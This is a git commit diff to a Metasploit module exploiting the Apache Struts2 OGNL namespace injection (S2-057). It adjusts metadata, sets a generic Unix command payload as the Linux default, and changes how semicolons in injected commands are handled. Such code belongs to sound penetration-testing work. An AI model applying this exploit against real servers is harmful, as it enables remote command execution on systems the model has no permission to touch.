Make some small changes:

Changes made: * DisclosureDate * Privileged to false * Remove gsub for ';' * Set cmd/unix/generic as the default payload for ARCH_CMD (linux)
2018-09-07 14:48:33 -05:00 · 2018-09-07 14:48:33 -05:00 · bd50e00ccc
parent 99ca6cef49
commit bd50e00ccc
1 changed files with 6 additions and 11 deletions
--- a/modules/exploits/multi/http/struts2_namespace_ognl.rb
+++ b/modules/exploits/multi/http/struts2_namespace_ognl.rb
@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],
        ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],
      ],
-      'Privileged'     => true,
+      'Privileged'     => false,
      'Targets'        => [
        [
          'Automatic detection', {
@ -55,10 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
          'Linux', {
            'Platform'       => %w{ unix linux },
            'Arch'           => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
          },
        ],
      ],
-      'DisclosureDate' => 'Apr 10 2018',
+      'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018
      'DefaultTarget'  => 0))

      register_options(
@ -282,13 +283,8 @@ class MetasploitModule < Msf::Exploit::Remote

  def execute_command(cmd_input, opts={})
    # Semicolons appear to be a bad character in OGNL.  cmdstager doesn't understand that.
-    #   We'll replace ';' with '||' and hope for the best
-
    if cmd_input.include? ';'
-      print_error("WARNING: Command contains bad characters: semicolons (;).  Substituting '||'")
-      vprint_status("BEFORE: #{cmd_input}")
-      cmd_input = cmd_input.gsub(";" ,"||")
-      vprint_status("AFTER: #{cmd_input}")
+      print_warning("WARNING: Command contains bad characters: semicolons (;).")
    end

    begin
@ -392,4 +388,3 @@ class MetasploitModule < Msf::Exploit::Remote
    end
  end
 end
-